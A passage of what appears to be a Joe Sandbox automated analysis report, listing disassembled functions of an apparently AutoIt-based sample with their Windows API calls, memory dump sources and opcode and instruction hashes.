                                                                                                                                                                  • Instruction Fuzzy Hash: 4C417765C31324B6DB10EBF4C88AACFB7AC9F05310F508467E915F3162EA70E6748BA5
                                                                                                                                                                  Function 00249D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00249DB0
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00249E57
                                                                                                                                                                  • IsMenu.USER32(?), ref: 00249E6F
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00249EB7
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00249ED0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                                                  • Opcode ID: 569325db9e2cccaeb6d70859ca124932c92b20770cf1a2e0f194ae4a5d8d990d
                                                                                                                                                                  • Instruction ID: 4759559b34236e43beb5c86643d237c91680d82b4455e80b51ca0e2b20151dce
                                                                                                                                                                  • Opcode Fuzzy Hash: 569325db9e2cccaeb6d70859ca124932c92b20770cf1a2e0f194ae4a5d8d990d
                                                                                                                                                                  • Instruction Fuzzy Hash: DE413875A1020AEFDB24DF64E884E9ABBF4FF09354F04812AE90597250D770EDA0DB50
                                                                                                                                                                  Function 00248DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00248DF4
                                                                                                                                                                  • GetWindowLongW.USER32(00DA7820,000000F0), ref: 00248E27
                                                                                                                                                                  • GetWindowLongW.USER32(00DA7820,000000F0), ref: 00248E5C
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00248E8E
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00248EB8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00248EC9
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00248EE3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                  • Opcode ID: b7dbf684d28d1d4c1bb497779997abaa8d7efb809d1d5ca39c4d9ba9988c4985
                                                                                                                                                                  • Instruction ID: 286329cae221ffad4ec26c7558d7ae5da3e0e38496f17210557527583db6f0d6
                                                                                                                                                                  • Opcode Fuzzy Hash: b7dbf684d28d1d4c1bb497779997abaa8d7efb809d1d5ca39c4d9ba9988c4985
                                                                                                                                                                  • Instruction Fuzzy Hash: F4311431720216AFEB29CF58EC88F5937A5FB4A764F154164F6058B2B2CFB1A860DB41
                                                                                                                                                                  Function 002216F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00221734
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022175A
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0022175D
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0022177B
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00221784
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 002217A9
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 002217B7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: 1fb4f8d8f6a8457b24b459216c42c3efbefe861634380924f87ba0ad53f2351e
                                                                                                                                                                  • Instruction ID: 33281fb79c1924968e61355b7122b5ce4f2655db7df5262d5ca1c6c80e0be300
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb4f8d8f6a8457b24b459216c42c3efbefe861634380924f87ba0ad53f2351e
                                                                                                                                                                  • Instruction Fuzzy Hash: BF217475610219BFDB109FA8EC88DBFB3ECEB59360B408125F915DB291DBB0ED518B60
                                                                                                                                                                  Function 00222FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                                                  • Opcode ID: 45f4c5c62a7a65fa48d24acdb135890f21eb74ec13219bea81de09710eadc3e5
                                                                                                                                                                  • Instruction ID: ec882558393a6c9a8c20582c82b5f91f7745ee976c75defedd0fb1072c716cd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 45f4c5c62a7a65fa48d24acdb135890f21eb74ec13219bea81de09710eadc3e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 05210D31134632B6D331EAB4AD06FBB73A89F65310F10401AF549871C2EBD59B66C2A1
                                                                                                                                                                  Function 002217C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022180D
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00221833
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00221836
                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00221857
                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00221860
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 0022187A
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00221888
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: c3eea7b7a33a781f697d8e0254b65000ce3e1cfff6da8591017c57b9e396b787
                                                                                                                                                                  • Instruction ID: 156b395083dc35d3d07b38b178c70104a4ed3a0c6fe21b214f7f70f5afa45eeb
                                                                                                                                                                  • Opcode Fuzzy Hash: c3eea7b7a33a781f697d8e0254b65000ce3e1cfff6da8591017c57b9e396b787
                                                                                                                                                                  • Instruction Fuzzy Hash: 242195356102157FEB109FE8ECC8DAAB7ECEB193607408125F904DB2A1DAB0EC518B60
                                                                                                                                                                  Function 0024A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0024A13B
                                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0024A148
                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0024A153
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0024A162
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0024A16E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                                  • Opcode ID: cd9e051a834e75ccd4455c15348852096088f7b2c36a1375a35c89625e439d44
                                                                                                                                                                  • Instruction ID: b9ed7340f902961afe948810c80712edd8bd4b1a91f188e7a93fd5a5640120d5
                                                                                                                                                                  • Opcode Fuzzy Hash: cd9e051a834e75ccd4455c15348852096088f7b2c36a1375a35c89625e439d44
                                                                                                                                                                  • Instruction Fuzzy Hash: 6211B2B255021DBEFF155F64DC86EE77F5DEF08798F014215FA08A6090C6729C21DBA0
                                                                                                                                                                  Function 00204C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __getptd_noexit.LIBCMT ref: 00204C3E
                                                                                                                                                                    • Part of subcall function 002086B5: GetLastError.KERNEL32(?,00200127,002088A3,00204673,?,?,00200127,?,001E125D,00000058,?,?), ref: 002086B7
                                                                                                                                                                    • Part of subcall function 002086B5: __calloc_crt.LIBCMT ref: 002086D8
                                                                                                                                                                    • Part of subcall function 002086B5: GetCurrentThreadId.KERNEL32 ref: 00208701
                                                                                                                                                                    • Part of subcall function 002086B5: SetLastError.KERNEL32(00000000,00200127,002088A3,00204673,?,?,00200127,?,001E125D,00000058,?,?), ref: 00208719
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00204C1D), ref: 00204C52
                                                                                                                                                                  • __freeptd.LIBCMT ref: 00204C59
                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00204C1D), ref: 00204C61
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00204C1D), ref: 00204C91
                                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00204C1D), ref: 00204C98
                                                                                                                                                                  • __freefls@4.LIBCMT ref: 00204CB4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1445074172-0
                                                                                                                                                                  • Opcode ID: cebaf3d4e9878c3053bc9dd50e4ce32658dca2d2558198a521c52f86c10ce2a9
                                                                                                                                                                  • Instruction ID: f870e7ea6021c7f531d2bbeb5a0961c2de04a83cb8e64277574da8c0b81e7710
                                                                                                                                                                  • Opcode Fuzzy Hash: cebaf3d4e9878c3053bc9dd50e4ce32658dca2d2558198a521c52f86c10ce2a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E01F1B09207069BD708BF64E80990E3BA8AF04314710C509F6488B2C3EF30D8628E91
                                                                                                                                                                  Function 0024E13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024E14D
                                                                                                                                                                  • _memset.LIBCMT ref: 0024E15C
                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A3EE0,002A3F24), ref: 0024E18B
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0024E19D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                  • String ID: $?*$>*
                                                                                                                                                                  • API String ID: 3277943733-711202312
                                                                                                                                                                  • Opcode ID: 054722ab1669dcca179ec09983e1c7c52c513c69ff3c225c6f008574e9e8234c
                                                                                                                                                                  • Instruction ID: d1742e3935eedf82cb9d73e84634dcf87d3e107d2376ed298a36e5bab17cbcb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 054722ab1669dcca179ec09983e1c7c52c513c69ff3c225c6f008574e9e8234c
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF054F1A60305BFF3109B65BC0AF77BAACEF07354F004420FA08D5192DBB64E204AA4
                                                                                                                                                                  Function 001FC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 001FC6C0
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FC701
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 001FC729
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 001FC856
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 001FC86F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                  • Opcode ID: 6d039539ca3af521d462523d4f415a85b382a2eab152281accd2f68aafcc5904
                                                                                                                                                                  • Instruction ID: 33d9707c1e72272e229dd7b5fcdc95f650b7073f76698a87bc1a677cb1be8899
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d039539ca3af521d462523d4f415a85b382a2eab152281accd2f68aafcc5904
                                                                                                                                                                  • Instruction Fuzzy Hash: D4B15879A0024EDBDF14CFA8C6806EDB7B1FF08350F158129ED59EB654DB30AA50DBA4
                                                                                                                                                                  Function 00229569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                                                  • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                                  • Instruction ID: a3c17dc945b7972b106dc40504603732174af239328623b531e0944c2670aa7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                                                  • Instruction Fuzzy Hash: B561CF7052065AAFDB01EFA1CC81EFEB7A9AF14304F044458F81A6B2D2EB74ED65CB50
                                                                                                                                                                  Function 001FDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2037614760-0
                                                                                                                                                                  • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                  • Instruction ID: b4a12d3eda48f315f421565580707134250b32d1e4a0374bfe602059baf06498
                                                                                                                                                                  • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4051233090021DABCB15EF98E4419BDB7B2FF14711F50404EFA80AB292DBB45F52DB95
                                                                                                                                                                  Function 00222ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00222AF6
                                                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00222B68
                                                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00222BC3
                                                                                                                                                                  • _memmove.LIBCMT ref: 00222BED
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00222C3A
                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00222C68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
